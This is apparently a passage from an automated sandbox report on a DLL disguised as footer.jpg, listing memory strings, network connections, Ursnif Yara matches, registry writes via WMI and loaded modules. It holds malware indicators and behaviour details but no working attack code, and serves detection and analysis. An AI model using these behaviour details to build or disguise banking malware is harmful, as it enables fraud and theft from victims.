Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bub-12-prallt-mit-velo-in-auto-und-wird-schwer-verletzt/ar-BB1d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/corona-hinterl%c3%a4sst-tiefe-spuren-unispital-z%c3%bcrich-schr
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/direkt-ins-ohr/ar-BB1dx8gq?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/er-hat-uns-zuerst-provoziert-erst-dann-schlug-ich-ihn/ar-BB1dxy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/fcz-chaot-nach-brutaler-schl%c3%a4gerei-vor-gericht-nicht-das-e
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/juso-reicht-initiative-f%c3%bcr-stadtz%c3%bcrcher-gratis-%c3%b6
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/mordprozess-in-meilen-die-verteidigerin-will-einen-vollumf%c3%a
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%a4ter-ist-gest%c3%a4ndig-und-sagt-er-sei-provoziert-worden
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/weshalb-corona-das-bev%c3%b6lkerungswachstum-im-kanton-z%c3%bcr
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49771 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.1036558565.0000000000FBB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004014E8 NtCreateSection,memset,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0040183B NtMapViewOfSection,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004022C5 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04877507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0487B2F1 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0285 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF009C NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0066 NtAllocateVirtualMemory,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004020A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0487B0CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_048723FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0487936B

Source: footer.jpg.dll

Static PE information: invalid certificate

Source: footer.jpg.dll

Static PE information: Number of sections : 15 > 10

Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: footer.jpg.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll
